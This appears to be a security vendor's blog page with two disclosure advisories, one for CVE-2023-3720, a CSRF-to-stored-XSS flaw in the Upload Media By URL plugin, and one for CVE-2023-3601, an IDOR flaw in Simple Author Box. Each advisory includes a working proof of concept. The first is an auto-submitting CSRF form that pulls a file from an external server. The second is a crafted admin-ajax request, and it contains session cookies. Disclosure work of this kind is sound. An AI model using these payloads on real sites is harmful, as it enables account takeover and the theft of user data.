CleanTalk's blog

    Sign up

    Author: Dmitrii I

    • CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

      CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF

      During a thorough security assessment of the Upload Media By URL plugin for WordPress, a concerning medium-level vulnerability has been uncovered in versions prior to 1.0.8. This vulnerability poses a significant risk to your website’s security and calls for immediate action! If exploited, this vulnerability allows attackers to potentially upload files containing malicious code directly to your WordPress site, exposing your users to harmful scripts and attacks.

      Main info:

      CVECVE-2023-3720
      PluginUpload Media By URL
      CriticalMedium
      Publicly PublishedAugust 2, 2023
      Last UpdatedAugust 2, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A2: Broken Authentication and Session Management
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720
      https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954
      Plugin Security Certification by CleanTalk

      Timeline

      July 10, 2023Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed
      July 10, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 17, 2023The author has eliminated the vulnerability and patched his plugin
      August 2, 2023Registered CVE-2023-3720

      Discovery of the Vulnerability

      During a security assessment of the Upload Media By URL plugin for WordPress, a medium vulnerability was identified in versions prior to 1.0.8. The plugin lacked Cross-Site Request Forgery (CSRF) protection when handling file uploads, allowing attackers to trick logged-in administrators into uploading files on their behalf, including HTML files containing malicious JavaScript code that could execute when accessed by users with the unfiltered_html capability.

      Understanding Cross-Site Request Forgery (CSRF)

      Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. In this case, attackers can exploit the absence of CSRF protection in the Upload Media By URL plugin to create a crafted HTML file hosted on an external server. If a privileged user, such as an administrator, unknowingly accesses the external link, the malicious HTML file can trigger the upload of harmful files onto the WordPress system.

      Exploiting the Cross-Site Request Forgery (CSRF) vulnerability

      By crafting a malicious HTML file that includes a CSRF payload, attackers can entice administrators with upload privileges to visit the external link. Once the link is accessed, the malicious file exploits the lack of CSRF protection in the plugin to perform unauthorized actions, effectively tricking the administrator into uploading harmful files to the WordPress site.

      POC code:

      <html>

        <body>

        <script>history.pushState(”, ”, ‘/’)</script>

          <form action=”http://your_site/wordpress/wp-admin/upload.php” method=”POST” enctype=”multipart/form-data”>

            <input type=”hidden” name=”multiurl” value=”http://your_external_server/123.html” />

            <input type=”submit” value=”Submit request” />

          </form>

          <script>

            document.forms[0].submit();

          </script>

        </body>

      </html>

      Potential Risks and Real-World Impact

      The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:

      1. Stored Cross-Site Scripting (XSS) Attacks::
        Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users accessing the affected pages, and potentially exposing sensitive data or credentials.In almost all cases , Stored XSS is used to steal cookies , thereby Account Takeover.
      2. Malware Distribution:
        Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website.
      3. Unauthorized Content Injection:
        Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site’s reputation, or defacing it with inappropriate or harmful materials.
      4. Social Engineering Exploits:
        Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.

      Recommendations for Improved Security

      To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

      • Immediate Plugin Update:
        Website administrators should update the Upload Media By URL plugin to the latest version, which includes CSRF protection and patches this vulnerability.
      • Implement CSRF Protection:
        Plugin developers should include robust CSRF protection mechanisms when processing sensitive actions, such as file uploads, to prevent unauthorized access.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Privilege Restriction:
        Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
      • User Awareness:
        Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

      By addressing the CSRF vulnerability in the Upload Media By URL plugin and implementing these security recommendations, website owners can significantly reduce the likelihood of security breaches, protect their site’s integrity, and safeguard against social engineering exploits.

      Use CleanTalk solutions to improve the security of your website

      Dmitrii i.

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website

    • CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

      We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.

      Main info:

      CVECVE-2023-3601
      PluginSimple Author Box
      CriticalVery High
      Publicly PublishedJuly 24, 2023
      Last UpdatedJuly 24, 2023
      ResearcherDmtirii Ignatyev
      OWASP TOP-10A01:2021-Broken Access Control
      PoCYes
      ExploitWill be later
      Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
      https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
      Plugin Security Certification by CleanTalk

      Timeline

      July 5, 2023Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
      July 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
      July 16, 2023The author has eliminated the vulnerability and patched his plugin
      July 24, 2023Registered CVE

      Discovery of the Vulnerability

      During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601) , specifically affecting versions up to and including 2.51. This vulnerability arises from an Insecure Direct Object Reference (IDOR) issue within the plugin’s code. The plugin fails to properly validate user input when handling requests (action=sab_get_author) to fetch information about specific users, leading to the unauthorized disclosure of sensitive user details.

      Understanding Insecure Direct Object Reference (IDOR)

      Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

      Exploiting the IDOR Vulnerability

      In the context of the Simple Author Box vulnerability, the plugin does not adequately check whether a user is authorized to access specific user information before displaying it. By altering the user ID parameter in a request, an authenticated attacker with Contributor-level permissions or higher can access personal information of other users, including potentially sensitive data such as hashed passwords (CVE-2023-3601).

      POC:

      1. Create a new Post as a Contributor user.

      2. Add the “Simple Author Box” block.

      3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

      4. Inspect the response to see all of the information about that user, including the hashed password.

      POC request:

      POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
      Host: your_site_here
      User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
      Accept: /
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://your_site_here/wordpress/wp-admin/post-new.php
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 50
      Origin: http://your_site_here
      Connection: close
      Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
      Sec-Fetch-Dest: empty
      Sec-Fetch-Mode: cors
      Sec-Fetch-Site: same-origin

      action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7

      Potential Risks and Real-World Impact

      The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:

      1. Unauthorized Data Exposure:
        Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
      2. Credential Compromise:
        Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
      3. Identity Impersonation:
        The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

      Recommendations for Improved Security

      To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

      • Immediate Plugin Update:
        The developers of Simple Author Box should release a patched version that addresses the IDOR vulnerability. Website administrators should promptly update to the latest secure version to prevent exploitation.
      • Security Best Practices:
        Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data.
      • Regular Security Audits:
        Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
      • User Privilege Restriction:
        Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
      • User Awareness:
        Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

      By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.

      Use CleanTalk solutions to improve the security of your website

      Dmitrii ignatyev

      If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


      Check my website